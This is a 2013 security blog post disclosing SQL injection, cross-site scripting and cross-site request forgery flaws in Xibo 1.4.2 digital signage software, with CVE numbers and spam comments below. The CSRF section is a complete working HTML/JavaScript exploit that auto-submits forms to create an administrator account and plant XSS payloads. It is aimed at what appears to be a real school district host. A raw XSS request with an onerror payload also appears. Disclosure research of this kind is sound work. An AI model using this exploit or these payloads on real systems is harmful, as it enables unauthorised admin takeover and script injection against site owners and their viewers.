Wednesday, August 21, 2013

[Exploit] Xibo - Digital Signage SQL Injection, XSS, CSRF

# Title: Xibo - Digital Signage SQL Injection, XSS, CSRF
# Discovered and Reported: July 2013
# Discovered/Exploited By: Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators
# Exploit/Advisory: http://infosec42.blogspot.com/
# Software: Xibo 1.4.2 - http://xibo.org.uk/get-xibo/
# Version Tested: Xibo 1.4.2 (Other versions were not tested and may be vulnerable.)
# CVE: SQL Injection - CVE-2013-4887, XSS - CVE-2013-4888, CSRF - CVE-2013-4889



SQL Injection Vulnerability - CVE-2013-4887
 Figure 1 - JSON Error

Figure 2 - Xibo application log containing a SQL error that corresponds to JSON error


Figure 3 - JSON data containing the result of a successful SQL query

Figure 4 - Client side HTML code was modified to reflect the query demonstrated in figure 3


Cross-Site Scripting (XSS) Vulnerability - CVE-2013-4888

POST:  /index.php?p=layout&q=add&ajax=true
Data: layoutid=0&layout=Gimppy%3Cimg+src%3D42+onerror%3D'alert(%22InfoSec42%22)'%3E&description=%3Ciframe+src%3D'http%3A%2F%2Fsecurityevaluators.com'+width%3D1000+height%3D1000%3C%2Fiframe%3E&tags=&templateid=0

Figure 5 - JSON data indicating a successful request

Figure 6 - Rendered page containing injected HTML iframe and img tags


Cross-Site Request Forgery (CSRF) Vulnerability - CVE-2013-4889

The following JavaScript PoC will create an Xibo administrative user and also set the XSS payloads discussed above.

<html>
<head>
<title> Xibo - Digital Signage 1.4.2 CSRF Exploit.</title>
<!--
# CSRF Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators
# Exploited by: Jacob Holcomb - Security Analyst @ Independnet Security Evaluators
# CVE: CSRF - CVE-2013-4889, XSS - CVE-2013-4888
# http://infosec42.blogspot.com
# http://securityevaluators.com
-->
</head>
<body>
<h1>Please wait... </h1>
<script type="text/javascript">
//Add super user
function RF1(){
    document.write('<form name="addAdmin" target ="_blank" action="http://xibo.leland.k12.mi.us/index.php?p=user&q=AddUser&ajax=true" method="post">'+
    '<input type="hidden" name="userid" value="0">'+
    '<input type="hidden" name="username" value="Gimppy">'+
    '<input type="hidden" name="password" value="ISE">'+
    '<input type="hidden" name="email" value="Gimppy@infosec42.com">'+
    '<input type="hidden" name="usertypeid" value="1">'+
    '<input type="hidden" name="groupid" value="1">'+
    '</form>');
}

//Set XSS Payloads
function RF2(){
    document.write('<form name="addXSS" target="_blank" action="http://xibo.leland.k12.mi.us/index.php?p=layout&q=add&ajax=true" method="post">'+
    '<input type="hidden" name="layoutid" value="0">'+
    '<input type="hidden" name="layout" value="Gimppy<img src=42 onerror=\'alert(42)\'>">'+
    '<input type="hidden" name="description" value="<iframe src=\'http://securityevaluators.com\' width=100 height=1000</iframe>">'+
    '<input type="hidden" name="tags" value="">'+
    '<input type="hidden" name="templateid" value="0">'+
    '</form>');
}

function createPage(){
    RF1();
    RF2();
}

function _addAdmin(){
    document.addAdmin.submit();
}

function _addXSS(){
    document.addXSS.submit();
}

//Called Functions
createPage()
   
for (var i = 0; i < 2; i++){
    if(i == 0){
        window.setTimeout(_addAdmin, 0500);
    }
    else if(i == 1){
        window.setTimeout(_addXSS, 1000);
    }
    else{
        continue;
    }
}
</script>
</body>
</html>












3 comments:

  1. I have read this post. collection of post is a nice one. Thank you for this great sharing. Digital Signage.

    ReplyDelete
  2. Well written post! Digital Signage are about creating the most impactful experience for the customer to attract attention, provide information or support the selling process.
    digital signage

    ReplyDelete